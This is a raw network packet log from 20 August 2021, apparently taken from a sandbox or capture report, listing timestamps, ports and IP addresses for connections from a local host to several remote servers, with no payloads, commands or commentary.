Aug 20, 2021 17:09:47.797168970 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.797183037 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.797199965 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.797211885 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.797215939 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.797230959 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.797250032 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.797281027 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.797310114 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:47.805171967 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:47.812266111 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:54.567239046 CEST	49712	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:54.568810940 CEST	49714	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:54.568893909 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:54.587580919 CEST	443	49713	162.159.135.233	192.168.2.3
Aug 20, 2021 17:09:54.587768078 CEST	49713	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:09:54.624670982 CEST	13400	49714	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:54.624701977 CEST	13400	49712	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:54.624878883 CEST	49712	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:54.625708103 CEST	49714	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:54.625782013 CEST	49714	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:54.682435036 CEST	13400	49714	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:54.683046103 CEST	49714	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:54.765213966 CEST	13400	49714	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:54.917715073 CEST	13400	49714	91.142.79.35	192.168.2.3
Aug 20, 2021 17:09:54.964931011 CEST	49714	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:09:55.278394938 CEST	49714	13400	192.168.2.3	91.142.79.35
Aug 20, 2021 17:10:46.658082008 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.659126997 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.684062958 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.684191942 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.684799910 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.684912920 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.704149961 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.706330061 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.706841946 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.707329988 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.707741976 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.729968071 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.732166052 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.732597113 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733366013 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733381987 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733388901 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733398914 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733405113 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733416080 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733422995 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733437061 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733613968 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.733750105 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733769894 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.733849049 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.733923912 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.760649920 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760673046 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760689974 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760704994 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760719061 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760756016 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760767937 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760781050 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760797977 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760811090 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760823965 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760837078 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760837078 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.760850906 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760864973 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760874033 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.760881901 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760888100 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.760898113 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.760905981 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.760921001 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.760929108 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760935068 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.760943890 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760961056 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760973930 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.760997057 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.761009932 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.761045933 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.788224936 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788248062 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788259983 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788274050 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788288116 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788297892 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788307905 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788317919 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788327932 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788341045 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788352966 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788362026 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788372040 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788420916 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.788830042 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788899899 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788914919 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788944006 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788959026 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788985014 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.788997889 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.789010048 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.789022923 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.789035082 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.789048910 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.789064884 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.789077997 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790668964 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790684938 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790692091 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790702105 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790708065 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790719032 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790724993 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790736914 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790744066 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790750980 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790756941 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.790764093 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.799858093 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.799984932 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.801348925 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.815030098 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.815298080 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.816540956 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.816652060 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.827977896 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828557014 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828591108 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828619957 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828633070 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.828650951 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828680038 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.828680992 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828701973 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.828704119 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828733921 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828766108 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.828769922 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.828799009 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.828821898 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.828876019 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.829041004 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.829072952 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.829097986 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.829137087 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854496002 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854520082 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854536057 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854566097 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854607105 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854626894 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854626894 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854645967 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854660988 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854686022 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854712963 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854734898 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854747057 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854753971 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854790926 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854801893 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854808092 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854820013 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854865074 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854888916 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.854937077 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854954004 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.854994059 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.855024099 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.855027914 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.855043888 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.855077982 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.855129957 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.855166912 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.855187893 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.855207920 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.855221033 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.855226994 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.855267048 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.855295897 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880419016 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880456924 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880475998 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880497932 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880541086 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880567074 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880590916 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880640984 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880647898 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880650997 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880659103 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880682945 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880706072 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880708933 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880736113 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880738974 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880770922 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880791903 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.880835056 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.880851030 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881594896 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.881625891 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.881665945 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881681919 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881685019 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.881705999 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.881730080 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881772995 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.881774902 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881797075 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.881860971 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881866932 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881882906 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.881906033 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.881951094 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881957054 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.881972075 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882030010 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882056952 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882083893 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882107019 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882129908 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882112026 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882150888 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882168055 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882208109 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882211924 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882215023 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882236958 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882262945 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882328987 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882335901 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882338047 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882359982 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882421017 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882426977 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882510900 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882535934 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882575989 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882584095 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882591963 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882616997 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882666111 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882688999 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882690907 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882725000 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882731915 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882735968 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882786036 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882808924 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882858992 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882863998 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882869959 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882894993 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.882930994 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882941961 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.882967949 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.883017063 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.907835960 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.907861948 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.907881975 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.907927036 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.907931089 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.907958031 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.908000946 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.908019066 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.908025026 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.908612013 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.908633947 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.908658028 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.908750057 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.908912897 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912137032 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912159920 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912185907 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912209034 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912230968 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912250996 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912255049 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912276983 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912276983 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912293911 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912300110 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912322998 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912344933 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912353039 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912369967 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912370920 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912394047 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912405014 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912416935 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912436962 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:46.912441969 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912473917 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.912509918 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:46.957045078 CEST	49722	80	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:46.973835945 CEST	80	49722	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:46.974123955 CEST	49722	80	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:46.974508047 CEST	49722	80	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:46.991190910 CEST	80	49722	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:46.996121883 CEST	80	49722	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:46.996331930 CEST	49722	80	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.006448984 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.006545067 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.032337904 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.032386065 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.032423019 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.032463074 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.032466888 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.032478094 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.032525063 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.032548904 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.165287971 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.182142973 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.182295084 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.318809986 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.320792913 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.324582100 CEST	49724	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.332448959 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.344579935 CEST	80	49720	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.344645023 CEST	49720	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.346487045 CEST	80	49721	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.346573114 CEST	49721	80	192.168.2.3	109.234.32.63
Aug 20, 2021 17:10:47.349164963 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.350117922 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.350147963 CEST	443	49723	162.159.135.233	192.168.2.3
Aug 20, 2021 17:10:47.350205898 CEST	80	49724	109.234.32.63	192.168.2.3
Aug 20, 2021 17:10:47.350231886 CEST	49723	443	192.168.2.3	162.159.135.233
Aug 20, 2021 17:10:47.350254059 CEST	49723	443	192.168.2.3	162.159.135.233
